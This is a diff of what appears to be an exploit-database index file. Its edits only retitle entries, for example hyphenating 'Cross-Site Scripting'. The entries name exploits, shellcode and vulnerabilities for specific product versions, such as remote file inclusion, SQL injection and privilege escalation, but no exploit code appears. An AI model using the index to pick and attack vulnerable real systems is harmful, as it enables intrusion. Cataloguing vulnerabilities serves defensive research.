Free",2015-03-31,Metasploit,windows,remote,0 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent XSS",2015-03-31,"Michael Hendrickx",windows,webapps,0 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80 -36582,platforms/php/webapps/36582.txt,"OneOrZero AIMS 'index.php' Cross Site Scripting",2012-01-18,"High-Tech Bridge SA",php,webapps,0 +36582,platforms/php/webapps/36582.txt,"OneOrZero AIMS 'index.php' Cross-Site Scripting",2012-01-18,"High-Tech Bridge SA",php,webapps,0 36583,platforms/php/webapps/36583.txt,"PostNuke pnAddressbook Module 'id' Parameter SQL Injection",2012-01-19,"Robert Cooper",php,webapps,0 36584,platforms/php/webapps/36584.txt,"Vastal EzineShop 'view_mags.php' SQL Injection",2012-01-19,Lazmania61,php,webapps,0 36585,platforms/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' Parameter SQL Injection",2012-01-20,snup,asp,webapps,0 -36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0 +36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0 36587,platforms/windows/remote/36587.py,"Savant Web Server 3.1 Remote Buffer Overflow",2012-01-21,red-dragon,windows,remote,0 -36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 Multiple Cross Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0 +36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0 36589,platforms/php/webapps/36589.txt,"Joomla! 'com_br' Component 'controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0 36590,platforms/php/webapps/36590.txt,"Tribiq CMS 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0 36591,platforms/php/webapps/36591.txt,"Joomla! Full 'com_full' Component 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0 @@ -33017,7 +33017,7 @@ id,file,description,date,author,platform,type,port 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0 36600,platforms/php/webapps/36600.txt,"WordPress Business Intelligence Plugin - SQL injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 -36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 +36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 @@ -33044,8 +33044,8 @@ id,file,description,date,author,platform,type,port 36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0 36629,platforms/php/webapps/36629.txt,"Joomla! 'com_motor' Component 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component Multiple SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 -36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 -36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross Site Scripting",2012-01-26,sonyy,php,webapps,0 +36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 +36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0 36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow / Denial of Service",2012-01-10,"Laurent Butti",linux,dos,0 36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component Local File Inclusion and SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 36635,platforms/php/webapps/36635.txt,"Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 @@ -33059,28 +33059,28 @@ id,file,description,date,author,platform,type,port 36644,platforms/php/webapps/36644.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter XSS",2012-01-31,RandomStorm,php,webapps,0 36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0 36646,platforms/php/webapps/36646.txt,"Joomla! 'com_cmotour' Component 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 -36647,platforms/php/webapps/36647.txt,"Lead Capture 'login.php' Script Cross Site Scripting",2012-01-21,HashoR,php,webapps,0 +36647,platforms/php/webapps/36647.txt,"Lead Capture 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps,0 36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot Remote Code Execution PoC Exploit",2015-04-06,"Jay Turla",multiple,remote,6667 36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 File Upload and Execute",2015-04-06,Metasploit,jsp,remote,8080 -36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross Site Scripting",2012-02-01,andsarmiento,php,webapps,0 -36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross Site Scripting",2012-02-01,andsarmiento,php,webapps,0 -36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 Multiple Cross Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 +36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 +36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 +36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 36657,platforms/php/webapps/36657.txt,"Joomla! 'com_bnf' Component 'seccion_id' Parameter SQL Injection",2012-02-02,"Daniel Godoy",php,webapps,0 -36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module Cross Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0 +36658,platforms/php/webapps/36658.txt,"iknSupport 'search' Module Cross-Site Scripting",2012-02-02,"Red Security TEAM",php,webapps,0 36659,platforms/php/webapps/36659.txt,"Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting",2012-02-02,"BHG Security Center",php,webapps,0 -36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0 +36660,platforms/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",php,webapps,0 36661,platforms/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' Parameter SQL Injection",2012-02-03,Am!r,php,webapps,0 36662,platforms/windows/dos/36662.txt,"Edraw Diagram Component 5 ActiveX Control 'LicenseName()' Method Buffer Overflow",2012-02-06,"Senator of Pirates",windows,dos,0 36663,platforms/linux/remote/36663.txt,"Apache HTTP Server 2.2.15 - 'mod_proxy' Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0 36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,php,webapps,0 -36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Parameter Cross Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0 +36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Parameter Cross-Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0 36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 DomainConfig.do operation Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0 36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 jsp/AddDC.jsp domainName Parameter XSS",2012-02-07,LiquidWorm,java,webapps,0 -36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0 +36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0 36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial Of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0 36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0 36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80 @@ -33096,8 +33096,8 @@ id,file,description,date,author,platform,type,port 36681,platforms/multiple/remote/36681.txt,"Apache MyFaces 'ln' Parameter Information Disclosure",2012-02-09,"Paul Nicolucci",multiple,remote,0 36682,platforms/php/dos/36682.php,"PHP PDORow Object Remote Denial Of Service",2011-09-24,anonymous,php,dos,0 36683,platforms/php/webapps/36683.txt,"Dolibarr 3.x - 'adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",php,webapps,0 -36684,platforms/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps,0 -36685,platforms/php/webapps/36685.txt,"CubeCart 3.0.20 Multiple Script redir Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 +36684,platforms/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,java,webapps,0 +36685,platforms/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script redir Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36686,platforms/php/webapps/36686.txt,"CubeCart 3.0.20 admin/login.php goto Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h 'path_to_admin/product.php' Cross Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 @@ -33105,74 +33105,74 @@ id,file,description,date,author,platform,type,port 36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post Auth Remote Root exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 -36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting",2012-02-10,sonyy,php,webapps,0 +36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 SQL Injection and Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0 -36695,platforms/php/webapps/36695.txt,"Zimbra 'view' Parameter Cross Site Scripting",2012-02-13,sonyy,php,webapps,0 +36695,platforms/php/webapps/36695.txt,"Zimbra 'view' Parameter Cross-Site Scripting",2012-02-13,sonyy,php,webapps,0 36696,platforms/php/webapps/36696.txt,"Nova CMS administrator/modules/moduleslist.php id Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36697,platforms/php/webapps/36697.txt,"Nova CMS optimizer/index.php fileType Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36698,platforms/php/webapps/36698.txt,"Nova CMS includes/function/gets.php filename Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36699,platforms/php/webapps/36699.txt,"Nova CMS - includes/function/usertpl.php conf[blockfile] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36701,platforms/lin_x86/shellcode/36701.c,"Linux/x86 - Create 'my.txt' Working Directory shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",lin_x86,shellcode,0 -36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_db_setup.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_display.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36705,platforms/php/webapps/36705.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_form.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36706,platforms/php/webapps/36706.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_graph_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36707,platforms/php/webapps/36707.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_local_rules.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36708,platforms/php/webapps/36708.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_logout.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36709,platforms/php/webapps/36709.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36710,platforms/php/webapps/36710.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_maintenance.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36711,platforms/php/webapps/36711.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_payload.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36712,platforms/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 help/base_setup_help.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36713,platforms/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_action.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36714,platforms/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_cache.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36715,platforms/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_db.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36716,platforms/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_include.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36717,platforms/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_output_html.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36718,platforms/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_output_query.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36719,platforms/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_criteria.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36720,platforms/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 includes/base_state_query.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36721,platforms/php/webapps/36721.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 setup/base_conf_contents.php Multiple Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36702,platforms/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_db_setup.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36703,platforms/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36704,platforms/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_display.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36705,platforms/php/webapps/36705.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_form.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36706,platforms/php/webapps/36706.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_graph_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36707,platforms/php/webapps/36707.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_local_rules.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36708,platforms/php/webapps/36708.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_logout.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36709,platforms/php/webapps/36709.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36710,platforms/php/webapps/36710.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_maintenance.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36711,platforms/php/webapps/36711.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_payload.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36712,platforms/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - help/base_setup_help.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36713,platforms/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_action.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36714,platforms/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_cache.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36715,platforms/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_db.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36716,platforms/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_include.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36717,platforms/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_html.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36718,platforms/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_output_query.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36719,platforms/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_criteria.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36720,platforms/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_query.inc.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36721,platforms/php/webapps/36721.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - setup/base_conf_contents.php Multiple Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36722,platforms/php/webapps/36722.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - includes/base_state_common.inc.php GLOBALS[user_session_path] Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36723,platforms/php/webapps/36723.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 setup/setup2.php ado_inc_php Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36724,platforms/php/webapps/36724.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36725,platforms/php/webapps/36725.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_qry_alert.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36726,platforms/php/webapps/36726.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_qry_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36727,platforms/php/webapps/36727.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_alerts.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36728,platforms/php/webapps/36728.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_class.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36729,platforms/php/webapps/36729.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_iplink.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_ports.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36723,platforms/php/webapps/36723.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - setup/setup2.php ado_inc_php Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36724,platforms/php/webapps/36724.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36725,platforms/php/webapps/36725.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_alert.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36726,platforms/php/webapps/36726.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_qry_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36727,platforms/php/webapps/36727.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_alerts.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36728,platforms/php/webapps/36728.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_class.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36729,platforms/php/webapps/36729.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_common.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36730,platforms/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ipaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36731,platforms/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_iplink.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36732,platforms/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_ports.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36733,platforms/php/webapps/36733.txt,"WordPress Plugin 'WP Mobile Edition' 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",php,webapps,0 -36735,platforms/php/webapps/36735.txt,"WordPress Duplicator 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0 +36735,platforms/php/webapps/36735.txt,"WordPress Duplicator 0.5.14 - SQL Injection / CSRF",2015-04-13,"Claudio Viviani",php,webapps,0 36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0 36738,platforms/php/webapps/36738.txt,"WordPress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload",2015-04-13,"Claudio Viviani",php,webapps,0 36746,platforms/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80 36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0 36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0 -36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / <= 3.14 (Ubuntu) - splice() System Call Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0 +36743,platforms/linux/dos/36743.c,"Linux Kernel 3.13 / 3.14 (Ubuntu) - splice() System Call Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player casi32 Integer Overflow",2015-04-13,Metasploit,windows,remote,0 36745,platforms/osx/local/36745.rb,"Mac OS X - 'Rootpipe' Privilege Escalation",2015-04-13,Metasploit,osx,local,0 -36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 +36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36751,platforms/php/webapps/36751.txt,"WordPress Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80 36750,platforms/lin_x86/shellcode/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",lin_x86,shellcode,0 -36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 